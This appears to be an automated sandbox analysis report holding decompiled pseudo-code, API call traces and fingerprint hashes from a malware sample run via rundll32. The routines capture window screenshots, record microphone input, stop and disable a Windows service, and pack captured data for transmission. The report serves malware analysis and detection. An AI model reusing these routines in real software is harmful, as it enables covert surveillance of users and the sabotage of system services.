                                                            			E0464A9E0(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                            				signed int _v8;
                                                            				char _v88;
                                                            				short _v608;
                                                            				struct _SECURITY_ATTRIBUTES* _v612;
                                                            				signed int _t11;
                                                            				void* _t21;
                                                            				long _t26;
                                                            				struct _SECURITY_ATTRIBUTES* _t29;
                                                            				void* _t39;
                                                            				void* _t41;
                                                            				void* _t42;
                                                            				signed int _t44;
                                                            
                                                            				_t41 = __esi;
                                                            				_t11 =  *0x4684008; // 0xd355be4e
                                                            				_v8 = _t11 ^ _t44;
                                                            				_v612 = 0;
                                                            				_t29 = E04649620(__ebx,  &_v612, __edi, __esi, __eflags);
                                                            				_v612 = _t29;
                                                            				if(_t29 == 0) {
                                                            					L11:
                                                            					return E04655AFE(_v8 ^ _t44);
                                                            				}
                                                            				_push(__edi);
                                                            				E04646050(_t29, L"rebootshutdown",  &_v88, __edi, __esi);
                                                            				wsprintfW( &_v608, L"Global\\%s",  &_v88);
                                                            				_t39 = CreateMutexW(0, 1,  &_v608);
                                                            				if(_t39 != 0) {
                                                            					_t26 = GetLastError();
                                                            					_t51 = _t26 - 0xb7;
                                                            					if(_t26 == 0xb7) {
                                                            						WaitForSingleObject(_t39, 0xffffffff);
                                                            					}
                                                            				}
                                                            				_push(_t41);
                                                            				_t42 = 0;
                                                            				_t21 = E0464A280(_t29, 0, _t39, 0, _t51);
                                                            				_t52 = _t21;
                                                            				if(_t21 != 0) {
                                                            					L8:
                                                            					if(_t39 != 0) {
                                                            						ReleaseMutex(_t39);
                                                            						CloseHandle(_t39);
                                                            					}
                                                            					L04655B0F(_t29);
                                                            					goto L11;
                                                            				} else {
                                                            					do {
                                                            						_t42 = _t42 + 1;
                                                            						Sleep(5);
                                                            					} while (E0464A280(Sleep, _t42, _t39, _t42, _t52) == 0);
                                                            					_t29 = _v612;
                                                            					goto L8;
                                                            				}
                                                            			}















                                                            0x0464a9e0
                                                            0x0464a9e9
                                                            0x0464a9f0
                                                            0x0464a9fa
                                                            0x0464aa09
                                                            0x0464aa0b
                                                            0x0464aa13
                                                            0x0464aab4
                                                            0x0464aac2
                                                            0x0464aac2
                                                            0x0464aa19
                                                            0x0464aa22
                                                            0x0464aa37
                                                            0x0464aa51
                                                            0x0464aa55
                                                            0x0464aa57
                                                            0x0464aa5d
                                                            0x0464aa62
                                                            0x0464aa67
                                                            0x0464aa67
                                                            0x0464aa62
                                                            0x0464aa6d
                                                            0x0464aa70
                                                            0x0464aa72
                                                            0x0464aa77
                                                            0x0464aa79
                                                            0x0464aa97
                                                            0x0464aa9a
                                                            0x0464aa9d
                                                            0x0464aaa4
                                                            0x0464aaa4
                                                            0x0464aaab
                                                            0x00000000
                                                            0x0464aa7b
                                                            0x0464aa81
                                                            0x0464aa83
                                                            0x0464aa84
                                                            0x0464aa8d
                                                            0x0464aa91
                                                            0x00000000
                                                            0x0464aa91

                                                            APIs
                                                              • Part of subcall function 04649620: wsprintfW.USER32 ref: 04649654
                                                              • Part of subcall function 04646050: RegOpenKeyExW.KERNEL32(80000002,004F0053,00000000,00020119,?,00000000,00000000,0000038F), ref: 046461F1
                                                              • Part of subcall function 04646050: RegQueryValueExW.KERNEL32(?,0061004D,00000000,?,?,0000004A), ref: 0464621F
                                                              • Part of subcall function 04646050: RegCloseKey.ADVAPI32(?), ref: 04646235
                                                            • wsprintfW.USER32 ref: 0464AA37
                                                            • CreateMutexW.KERNEL32(00000000,00000001,?), ref: 0464AA4B
                                                            • GetLastError.KERNEL32 ref: 0464AA57
                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0464AA67
                                                            • Sleep.KERNEL32(00000005), ref: 0464AA84
                                                            • ReleaseMutex.KERNEL32(00000000), ref: 0464AA9D
                                                            • CloseHandle.KERNEL32(00000000), ref: 0464AAA4
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CloseMutexwsprintf$CreateErrorHandleLastObjectOpenQueryReleaseSingleSleepValueWait
                                                            • String ID: Global\%s$rebootshutdown
                                                            • API String ID: 2719347979-2939806910
                                                            • Opcode ID: 4bc7cc1db92f21df601545d8c06ccdae283451c565e119b574ca8f71c7e65966
                                                            • Instruction ID: f15a57469ba899a2f5c12999342ca149c9296b67132ada1c0782331663a23620
                                                            • Opcode Fuzzy Hash: 4bc7cc1db92f21df601545d8c06ccdae283451c565e119b574ca8f71c7e65966
                                                            • Instruction Fuzzy Hash: CF21EE71A44208ABDF10EFE4DD8CBAF7378EF94714F140158E90A96284FF39AD448B55
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • GetWindowRect.USER32(00000000,?), ref: 046376E3
                                                            • CreateCompatibleDC.GDI32 ref: 046376EA
                                                            • CreateCompatibleBitmap.GDI32(?,?,?), ref: 04637723
                                                            • SelectObject.GDI32(00000000,00000000), ref: 0463772E
                                                            • PrintWindow.USER32(00000000,00000000,00000000,?,?,?), ref: 04637745
                                                            • PrintWindow.USER32(00000000,00000000,00000002,?,?,?), ref: 0463774B
                                                            • PrintWindow.USER32(00000000,00000000,00000000,?,?,?), ref: 04637755
                                                            • BitBlt.GDI32(?,?,?,00000000,?,00000000,00000000,00000000,00CC0020), ref: 046377A2
                                                            • DeleteObject.GDI32(?), ref: 046377B2
                                                            • DeleteDC.GDI32(00000000), ref: 046377B9
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Window$Print$CompatibleCreateDeleteObject$BitmapRectSelect
                                                            • String ID:
                                                            • API String ID: 718922780-0
                                                            • Opcode ID: 31253f0945fe40197277f61d7b02bea19f6442204431b62344e670bd6d45231a
                                                            • Instruction ID: e42218a1efb574b9e87f967814a2e7a484dc2f59c4637dd1fd98cc4ed3474583
                                                            • Opcode Fuzzy Hash: 31253f0945fe40197277f61d7b02bea19f6442204431b62344e670bd6d45231a
                                                            • Instruction Fuzzy Hash: A5313BB1A10609EEDB11DBB8DC58AAEBBBCEF49351F109219F505F2255FB3498818A60
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 91%
                                                            			E04643970(void* __ebx, short* __ecx, void* __edi, void* __esi) {
                                                            				signed int _v8;
                                                            				intOrPtr _v32;
                                                            				struct _SERVICE_STATUS _v36;
                                                            				int _v40;
                                                            				signed int _t10;
                                                            				void* _t28;
                                                            				void* _t36;
                                                            				short* _t38;
                                                            				void* _t39;
                                                            				void* _t40;
                                                            				signed int _t41;
                                                            
                                                            				_t10 =  *0x4684008; // 0xd355be4e
                                                            				_v8 = _t10 ^ _t41;
                                                            				_t38 = __ecx;
                                                            				_v40 = 0;
                                                            				_t28 = OpenSCManagerW(0, 0, 0xf003f);
                                                            				if(_t28 == 0) {
                                                            					return E04655AFE(_v8 ^ _t41);
                                                            				} else {
                                                            					_t36 = OpenServiceW(_t28, _t38, 0xf01ff);
                                                            					if(_t36 != 0) {
                                                            						_t39 = 0;
                                                            						do {
                                                            							if(QueryServiceStatus(_t36,  &_v36) == 0) {
                                                            								goto L6;
                                                            							} else {
                                                            								if(_v32 == 1) {
                                                            									_t40 = LockServiceDatabase(_t28);
                                                            									if(_t40 != 0) {
                                                            										_v40 = ChangeServiceConfigW(_t36, 0xffffffff, 4, 0xffffffff, 0, 0, 0, 0, 0, 0, 0);
                                                            										UnlockServiceDatabase(_t40);
                                                            									}
                                                            								} else {
                                                            									ControlService(_t36, 1,  &_v36);
                                                            									Sleep(0x1f4);
                                                            									goto L6;
                                                            								}
                                                            							}
                                                            							L10:
                                                            							CloseServiceHandle(_t36);
                                                            							goto L11;
                                                            							L6:
                                                            							_t39 = _t39 + 0x1f4;
                                                            						} while (_t39 < 0x1388);
                                                            						goto L10;
                                                            					}
                                                            					L11:
                                                            					CloseServiceHandle(_t28);
                                                            					return E04655AFE(_v8 ^ _t41);
                                                            				}
                                                            			}














                                                            0x04643976
                                                            0x0464397d
                                                            0x04643985
                                                            0x0464398e
                                                            0x04643997
                                                            0x0464399b
                                                            0x04643a59
                                                            0x046439a1
                                                            0x046439ae
                                                            0x046439b2
                                                            0x046439b4
                                                            0x046439b6
                                                            0x046439c3
                                                            0x00000000
                                                            0x046439c5
                                                            0x046439c9
                                                            0x046439fa
                                                            0x046439fe
                                                            0x04643a1c
                                                            0x04643a1f
                                                            0x04643a1f
                                                            0x046439cb
                                                            0x046439d2
                                                            0x046439dd
                                                            0x00000000
                                                            0x046439dd
                                                            0x046439c9
                                                            0x04643a25
                                                            0x04643a26
                                                            0x00000000
                                                            0x046439e3
                                                            0x046439e3
                                                            0x046439e9
                                                            0x00000000
                                                            0x046439f1
                                                            0x04643a2c
                                                            0x04643a2d
                                                            0x04643a46
                                                            0x04643a46

                                                            APIs
                                                            • OpenSCManagerW.ADVAPI32(00000000,00000000,000F003F), ref: 04643991
                                                            • OpenServiceW.ADVAPI32(00000000,?,000F01FF), ref: 046439A8
                                                            • QueryServiceStatus.ADVAPI32(00000000,?,?,000F01FF), ref: 046439BB
                                                            • ControlService.ADVAPI32(00000000,00000001,?,?,000F01FF), ref: 046439D2
                                                            • Sleep.KERNEL32(000001F4,?,000F01FF), ref: 046439DD
                                                            • LockServiceDatabase.ADVAPI32(00000000), ref: 046439F4
                                                            • ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,000F01FF), ref: 04643A15
                                                            • UnlockServiceDatabase.ADVAPI32(00000000), ref: 04643A1F
                                                            • CloseServiceHandle.ADVAPI32(00000000,?,000F01FF), ref: 04643A26
                                                            • CloseServiceHandle.ADVAPI32(00000000,?,000F01FF), ref: 04643A2D
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Service$CloseDatabaseHandleOpen$ChangeConfigControlLockManagerQuerySleepStatusUnlock
                                                            • String ID:
                                                            • API String ID: 3671983395-0
                                                            • Opcode ID: 36e2b2ae25235a39d4a609ec65cd334757c9e2de924951cd9f8ca306051691be
                                                            • Instruction ID: b079171d7534559f796e1bce8ac5f404bfc826b9b2ac850775e318fccefd8293
                                                            • Opcode Fuzzy Hash: 36e2b2ae25235a39d4a609ec65cd334757c9e2de924951cd9f8ca306051691be
                                                            • Instruction Fuzzy Hash: CE21B832741215ABDB149BA99C8CEBEB7B8FB85711B01116DFD06E2381FE799C448660
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 91%
                                                            			E046375B0(void* __ecx) {
                                                            				void* __ebx;
                                                            				void* __edi;
                                                            				void* __esi;
                                                            				void* _t18;
                                                            				struct HWND__* _t20;
                                                            				int _t29;
                                                            				void* _t36;
                                                            				intOrPtr* _t44;
                                                            				struct HWND__* _t47;
                                                            				signed int _t48;
                                                            				void* _t50;
                                                            				void* _t55;
                                                            
                                                            				_t50 = (_t48 & 0xffffffc0) - 0x34;
                                                            				_t36 = __ecx;
                                                            				_t18 = CreateCompatibleBitmap( *(__ecx + 0x14),  *(__ecx + 0x3c),  *(__ecx + 0x40));
                                                            				 *(__ecx + 0x1c) = _t18;
                                                            				SelectObject( *(__ecx + 0x18), _t18);
                                                            				_t20 = GetTopWindow(0);
                                                            				if(_t20 == 0) {
                                                            					L12:
                                                            					GetDIBits( *(_t36 + 0x18),  *(_t36 + 0x1c), 0,  *(_t36 + 0x40),  *(_t36 + 0x10), _t36 + 0x38, 0);
                                                            					DeleteObject( *(_t36 + 0x1c));
                                                            					return  *(_t36 + 0x10);
                                                            				}
                                                            				_t47 = GetWindow(_t20, 1);
                                                            				if(_t47 == 0) {
                                                            					goto L12;
                                                            				}
                                                            				_t44 = _t36 + 0x20;
                                                            				do {
                                                            					if(IsWindowVisible(_t47) != 0) {
                                                            						_t55 =  *((intOrPtr*)(_t44 + 0x10)) - 6;
                                                            						if(_t55 > 0 || _t55 == 0 &&  *((intOrPtr*)(_t44 + 0x14)) >= 3) {
                                                            							_t29 = 1;
                                                            						} else {
                                                            							_t29 = 0;
                                                            						}
                                                            						asm("movsd xmm0, [edi+0x8]");
                                                            						asm("movsd [esp], xmm0");
                                                            						E046376B0(_t36, _t47,  *_t44, _t44, _t47,  *((intOrPtr*)(_t44 + 4)), _t29);
                                                            						_t50 = _t50 - 8 + 0x10;
                                                            						SetWindowLongA(_t47, 0xffffffec, GetWindowLongA(_t47, 0xffffffec) | 0x02000000);
                                                            						if( *((intOrPtr*)(_t44 + 0x10)) < 6) {
                                                            							E046377E0(_t47, _t44);
                                                            							_t50 = _t50 + 4;
                                                            						}
                                                            					}
                                                            					_t47 = GetWindow(_t47, 3);
                                                            				} while (_t47 != 0);
                                                            				goto L12;
                                                            			}















                                                            0x046375b6
                                                            0x046375bb
                                                            0x046375c7
                                                            0x046375d1
                                                            0x046375d4
                                                            0x046375dc
                                                            0x046375e4
                                                            0x04637679
                                                            0x0463768d
                                                            0x04637696
                                                            0x046376a5
                                                            0x046376a5
                                                            0x046375f3
                                                            0x046375f7
                                                            0x00000000
                                                            0x00000000
                                                            0x046375fd
                                                            0x04637600
                                                            0x04637609
                                                            0x0463760e
                                                            0x04637611
                                                            0x0463761f
                                                            0x0463761b
                                                            0x0463761b
                                                            0x0463761b
                                                            0x04637624
                                                            0x04637630
                                                            0x04637639
                                                            0x0463763e
                                                            0x04637653
                                                            0x0463765d
                                                            0x04637662
                                                            0x04637667
                                                            0x04637667
                                                            0x0463765d
                                                            0x04637673
                                                            0x04637675
                                                            0x00000000

                                                            APIs
                                                            • CreateCompatibleBitmap.GDI32(?,?,?), ref: 046375C7
                                                            • SelectObject.GDI32(?,00000000), ref: 046375D4
                                                            • GetTopWindow.USER32(00000000), ref: 046375DC
                                                            • GetWindow.USER32(00000000,00000001), ref: 046375ED
                                                            • IsWindowVisible.USER32(00000000), ref: 04637601
                                                            • GetWindowLongA.USER32(00000000,000000EC), ref: 04637644
                                                            • SetWindowLongA.USER32(00000000,000000EC,00000000), ref: 04637653
                                                            • GetWindow.USER32(00000000,00000003), ref: 0463766D
                                                            • GetDIBits.GDI32(?,?,00000000,?,?,?,00000000), ref: 0463768D
                                                            • DeleteObject.GDI32(?), ref: 04637696
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Window$LongObject$BitmapBitsCompatibleCreateDeleteSelectVisible
                                                            • String ID:
                                                            • API String ID: 358708372-0
                                                            • Opcode ID: df40e720a7ff743d04cebb2b2f96a1af0ccf3f9585d3b505a7aa7890b3d9c78c
                                                            • Instruction ID: 5b6bf5b0bfbe041d055a0e604c41b6f8884b49407ea4a4376a0956b55bfa68ac
                                                            • Opcode Fuzzy Hash: df40e720a7ff743d04cebb2b2f96a1af0ccf3f9585d3b505a7aa7890b3d9c78c
                                                            • Instruction Fuzzy Hash: 2621CCB1600600EBDB196F68EC4CE6A3B69FF06317F004654FD01DA296FB25E920DBE5
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
                                                            			E04668810(char _a4) {
                                                            				char _v8;
                                                            
                                                            				_t26 = _a4;
                                                            				_t52 =  *_a4;
                                                            				if( *_a4 != 0x4678988) {
                                                            					E046684AD(_t52);
                                                            					_t26 = _a4;
                                                            				}
                                                            				E046684AD( *((intOrPtr*)(_t26 + 0x3c)));
                                                            				E046684AD( *((intOrPtr*)(_a4 + 0x30)));
                                                            				E046684AD( *((intOrPtr*)(_a4 + 0x34)));
                                                            				E046684AD( *((intOrPtr*)(_a4 + 0x38)));
                                                            				E046684AD( *((intOrPtr*)(_a4 + 0x28)));
                                                            				E046684AD( *((intOrPtr*)(_a4 + 0x2c)));
                                                            				E046684AD( *((intOrPtr*)(_a4 + 0x40)));
                                                            				E046684AD( *((intOrPtr*)(_a4 + 0x44)));
                                                            				E046684AD( *((intOrPtr*)(_a4 + 0x360)));
                                                            				_v8 =  &_a4;
                                                            				E046686D6(5,  &_v8);
                                                            				_v8 =  &_a4;
                                                            				return E04668726(4,  &_v8);
                                                            			}




                                                            0x04668816
                                                            0x04668819
                                                            0x04668821
                                                            0x04668824
                                                            0x04668829
                                                            0x0466882c
                                                            0x04668830
                                                            0x0466883b
                                                            0x04668846
                                                            0x04668851
                                                            0x0466885c
                                                            0x04668867
                                                            0x04668872
                                                            0x0466887d
                                                            0x0466888b
                                                            0x04668893
                                                            0x0466889c
                                                            0x046688a4
                                                            0x046688b8

                                                            APIs
                                                            • _free.LIBCMT ref: 04668824
                                                              • Part of subcall function 046684AD: HeapFree.KERNEL32(00000000,00000000,?,046612C5,00000001,00000001), ref: 046684C3
                                                              • Part of subcall function 046684AD: GetLastError.KERNEL32(D355BE4E,?,046612C5,00000001,00000001), ref: 046684D5
                                                            • _free.LIBCMT ref: 04668830
                                                            • _free.LIBCMT ref: 0466883B
                                                            • _free.LIBCMT ref: 04668846
                                                            • _free.LIBCMT ref: 04668851
                                                            • _free.LIBCMT ref: 0466885C
                                                            • _free.LIBCMT ref: 04668867
                                                            • _free.LIBCMT ref: 04668872
                                                            • _free.LIBCMT ref: 0466887D
                                                            • _free.LIBCMT ref: 0466888B
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: _free$ErrorFreeHeapLast
                                                            • String ID:
                                                            • API String ID: 776569668-0
                                                            • Opcode ID: 27e8fe3acbbb8696a5897caefd1bdd66f33b3523b5d2e7ee0db3949cf90c5fa4
                                                            • Instruction ID: a16425033540dff271fa169ea5a7a368a9b532cd85bc8c7f3ca6c35de183b97c
                                                            • Opcode Fuzzy Hash: 27e8fe3acbbb8696a5897caefd1bdd66f33b3523b5d2e7ee0db3949cf90c5fa4
                                                            • Instruction Fuzzy Hash: 2A11B676111208BFEB01FF64DC40DDD3BB9EF44264B5140A9FE1A8F225EA31EE509B84
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 04632027
                                                            • waveInGetNumDevs.WINMM ref: 04632032
                                                              • Part of subcall function 04631190: CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,?,74D0F5E0,?,0463205E), ref: 046311A9
                                                              • Part of subcall function 04631190: CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,?,74D0F5E0,?,0463205E), ref: 046311B6
                                                            • WaitForSingleObject.KERNEL32(?,000000FF,?,00000001,0000003F), ref: 04632082
                                                            • Sleep.KERNEL32(00000096), ref: 0463208D
                                                            • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 046320A9
                                                            • WaitForSingleObject.KERNEL32(?,000000FF), ref: 046320CE
                                                            • CloseHandle.KERNEL32(?), ref: 046320D7
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CreateEvent$ObjectSingleWait$CloseDevsHandleSleepwave
                                                            • String ID: |
                                                            • API String ID: 1906678132-2343686810
                                                            • Opcode ID: 2a77570d9177fbb95aa0051b6a2013c1c81fb8c28bb489c5b2ade9f6fa1b7331
                                                            • Instruction ID: 0e4dc8fcc9f7e13789954b354c7f829f23473ad6284b2311c0f87ee9401e700a
                                                            • Opcode Fuzzy Hash: 2a77570d9177fbb95aa0051b6a2013c1c81fb8c28bb489c5b2ade9f6fa1b7331
                                                            • Instruction Fuzzy Hash: 4031B671A40304BFFB109F64DC85FAA7BA4EF04715F244159FA04AE2C1EBB5AA40CBA5
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 55%
                                                            			E0463AFB0(intOrPtr* __ecx, signed int _a4, char _a5) {
                                                            				intOrPtr* _v8;
                                                            				void* __ebx;
                                                            				void* __edi;
                                                            				void* __esi;
                                                            				signed int _t33;
                                                            				void* _t34;
                                                            				signed int* _t35;
                                                            				signed int* _t41;
                                                            				signed int _t43;
                                                            				signed int* _t44;
                                                            				signed char _t47;
                                                            				signed int* _t57;
                                                            				intOrPtr* _t63;
                                                            				void* _t65;
                                                            				intOrPtr* _t67;
                                                            				signed char _t71;
                                                            				signed char _t72;
                                                            				signed int _t74;
                                                            				intOrPtr* _t75;
                                                            				signed int* _t80;
                                                            				void* _t83;
                                                            				void* _t85;
                                                            				void* _t88;
                                                            				intOrPtr _t89;
                                                            				signed int _t91;
                                                            				void* _t94;
                                                            				void* _t101;
                                                            
                                                            				_t67 = __ecx;
                                                            				_push(__ecx);
                                                            				_t33 = _a4;
                                                            				_push(_t88);
                                                            				_t63 = __ecx;
                                                            				 *__ecx = 0x467e8b0;
                                                            				 *((intOrPtr*)(__ecx + 4)) = _t33;
                                                            				_v8 = __ecx;
                                                            				 *((intOrPtr*)(_t33 + 0x38)) = __ecx;
                                                            				_t34 = CreateEventW(0, 1, 0, 0);
                                                            				_t83 = Sleep;
                                                            				 *(_t63 + 8) = _t34;
                                                            				_t35 =  *0x4687adc; // 0x0
                                                            				 *_t63 = 0x467e8a0;
                                                            				if(_t35 != 0) {
                                                            					L5:
                                                            					_push(_t67);
                                                            					_t7 = _t63 + 4; // 0x0
                                                            					_push(0x3f);
                                                            					_a5 = _t35[0x83];
                                                            					_push(2);
                                                            					_push( &_a4);
                                                            					_a4 = 0x7e;
                                                            					E04631C60( *_t7);
                                                            					_t11 = _t63 + 8; // 0x0
                                                            					WaitForSingleObject( *_t11, 0xffffffff);
                                                            					Sleep(0x96);
                                                            					E0463B6D0(_t63, _t63, _t83, _t88, _t98);
                                                            					_t41 =  *0x4687adc; // 0x0
                                                            					_a4 =  *_t41;
                                                            					while(1) {
                                                            						_t13 = _t63 + 4; // 0x0
                                                            						_t89 =  *_t13;
                                                            						_t43 =  *(_t89 + 0x5c) & 0x0000ffff;
                                                            						if(_t43 != 1) {
                                                            							goto L10;
                                                            						}
                                                            						_t75 =  *((intOrPtr*)(_t89 + 0x20));
                                                            						if(_t75 == 0) {
                                                            							goto L10;
                                                            						} else {
                                                            							_t101 =  *((intOrPtr*)( *_t75 + 0x40))();
                                                            							L14:
                                                            							if(_t101 != 0) {
                                                            								_t80 =  *0x4687adc; // 0x0
                                                            								_t91 = _a4;
                                                            								_t74 =  *_t80;
                                                            								if(_t74 != _t91) {
                                                            									_t50 =  <  ? _t74 : _t74 - _t91;
                                                            									_t85 = ( <  ? _t74 : _t74 - _t91) + ( <  ? _t74 : _t74 - _t91);
                                                            									_t23 = _t85 + 1; // 0x74cb6491
                                                            									_t65 = LocalAlloc(0x40, _t23);
                                                            									_t26 = _t65 + 1; // 0x1
                                                            									 *_t65 = 0x7f;
                                                            									E0465E060(_t26,  &(_t80[0x105]) + _t91 * 2, _t85);
                                                            									_t28 = _t85 + 1; // 0x74cb6491
                                                            									_t94 = _t94 + 8;
                                                            									_push(0x3f);
                                                            									_push(_t65);
                                                            									E04631C60( *((intOrPtr*)(_v8 + 4)));
                                                            									LocalFree(_t65);
                                                            									_t57 =  *0x4687adc; // 0x0
                                                            									_t63 = _v8;
                                                            									_a4 =  *_t57;
                                                            								}
                                                            								Sleep(0x12c);
                                                            								continue;
                                                            							}
                                                            						}
                                                            						L18:
                                                            						_t44 =  *0x4687adc; // 0x0
                                                            						__eflags = _t44[0x83];
                                                            						_t71 =  ==  ? 0 :  *0x46878c9 & 0x000000ff;
                                                            						__eflags = _t71;
                                                            						 *0x46878c9 = _t71;
                                                            						return _t63;
                                                            						goto L19;
                                                            						L10:
                                                            						__eflags = _t43 - 2;
                                                            						if(_t43 == 2) {
                                                            							_t72 =  *(_t89 + 0x24);
                                                            							__eflags = _t72;
                                                            							if(_t72 != 0) {
                                                            								_t47 =  *((intOrPtr*)( *((intOrPtr*)(_t72 + 4)) + 0x40))();
                                                            								__eflags = _t47;
                                                            								if(_t47 != 0) {
                                                            									__eflags =  *(_t89 + 0x48);
                                                            									goto L14;
                                                            								}
                                                            							}
                                                            						}
                                                            						goto L18;
                                                            					}
                                                            				} else {
                                                            					 *0x46878c9 = 1;
                                                            					_t88 = 0;
                                                            					asm("o16 nop [eax+eax]");
                                                            					while(_t35 == 0) {
                                                            						Sleep(0x64);
                                                            						if(_t88 == 0x63) {
                                                            							 *0x46878c9 = 0;
                                                            							return _t63;
                                                            						} else {
                                                            							_t35 =  *0x4687adc; // 0x0
                                                            							_t88 = _t88 + 1;
                                                            							_t98 = _t88 - 0x64;
                                                            							if(_t88 < 0x64) {
                                                            								continue;
                                                            							} else {
                                                            								goto L5;
                                                            							}
                                                            						}
                                                            						goto L19;
                                                            					}
                                                            					goto L5;
                                                            				}
                                                            				L19:
                                                            			}






























                                                            0x0463afb0
                                                            0x0463afb3
                                                            0x0463afb4
                                                            0x0463afb8
                                                            0x0463afba
                                                            0x0463afc2
                                                            0x0463afc8
                                                            0x0463afcd
                                                            0x0463afd0
                                                            0x0463afd3
                                                            0x0463afd9
                                                            0x0463afdf
                                                            0x0463afe2
                                                            0x0463afe7
                                                            0x0463afef
                                                            0x0463b018
                                                            0x0463b01e
                                                            0x0463b01f
                                                            0x0463b022
                                                            0x0463b024
                                                            0x0463b02a
                                                            0x0463b02c
                                                            0x0463b02d
                                                            0x0463b031
                                                            0x0463b038
                                                            0x0463b03b
                                                            0x0463b046
                                                            0x0463b04a
                                                            0x0463b04f
                                                            0x0463b056
                                                            0x0463b060
                                                            0x0463b060
                                                            0x0463b060
                                                            0x0463b063
                                                            0x0463b06a
                                                            0x00000000
                                                            0x00000000
                                                            0x0463b06c
                                                            0x0463b071
                                                            0x00000000
                                                            0x0463b073
                                                            0x0463b078
                                                            0x0463b0b7
                                                            0x0463b0b7
                                                            0x0463b0b9
                                                            0x0463b0bf
                                                            0x0463b0c2
                                                            0x0463b0c6
                                                            0x0463b0ce
                                                            0x0463b0d7
                                                            0x0463b0da
                                                            0x0463b0e9
                                                            0x0463b0ed
                                                            0x0463b0f0
                                                            0x0463b0f4
                                                            0x0463b0fc
                                                            0x0463b0ff
                                                            0x0463b105
                                                            0x0463b108
                                                            0x0463b109
                                                            0x0463b10f
                                                            0x0463b115
                                                            0x0463b11a
                                                            0x0463b125
                                                            0x0463b125
                                                            0x0463b12d
                                                            0x00000000
                                                            0x0463b12d
                                                            0x0463b0b7
                                                            0x0463b134
                                                            0x0463b134
                                                            0x0463b144
                                                            0x0463b14d
                                                            0x0463b14d
                                                            0x0463b150
                                                            0x0463b159
                                                            0x00000000
                                                            0x0463b08e
                                                            0x0463b08e
                                                            0x0463b091
                                                            0x0463b097
                                                            0x0463b09a
                                                            0x0463b09c
                                                            0x0463b0a8
                                                            0x0463b0ab
                                                            0x0463b0ad
                                                            0x0463b0b3
                                                            0x00000000
                                                            0x0463b0b3
                                                            0x0463b0ad
                                                            0x0463b09c
                                                            0x00000000
                                                            0x0463b091
                                                            0x0463aff1
                                                            0x0463aff1
                                                            0x0463aff8
                                                            0x0463affa
                                                            0x0463b000
                                                            0x0463b006
                                                            0x0463b00b
                                                            0x0463b080
                                                            0x0463b08b
                                                            0x0463b00d
                                                            0x0463b00d
                                                            0x0463b012
                                                            0x0463b013
                                                            0x0463b016
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x0463b016
                                                            0x00000000
                                                            0x0463b00b
                                                            0x00000000
                                                            0x0463b000
                                                            0x00000000

                                                            APIs
                                                            • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,046878D8,?,04639B4C,?,046878D8,00000000), ref: 0463AFD3
                                                            • Sleep.KERNEL32(00000064,?,?,?,046878D8,?,04639B4C,?,046878D8,00000000), ref: 0463B006
                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF,046878D8,00000002,0000003F,?,?,?,?,046878D8,?,04639B4C,?), ref: 0463B03B
